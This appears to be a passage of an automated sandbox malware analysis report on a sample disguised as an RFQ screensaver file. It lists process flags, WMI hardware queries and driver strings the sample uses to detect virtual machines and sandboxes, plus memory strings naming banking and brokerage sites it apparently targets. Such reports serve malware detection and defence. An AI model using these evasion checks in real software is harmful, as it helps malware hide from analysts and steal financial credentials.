Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RFQPO3D93876738.scr.exe PID: 7368, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Memory allocated: 2422B5A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Memory allocated: 24245010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6491	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3212	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 8786	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 1042	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -6456360425798339s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8072	Thread sleep time: -35048813740048126s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
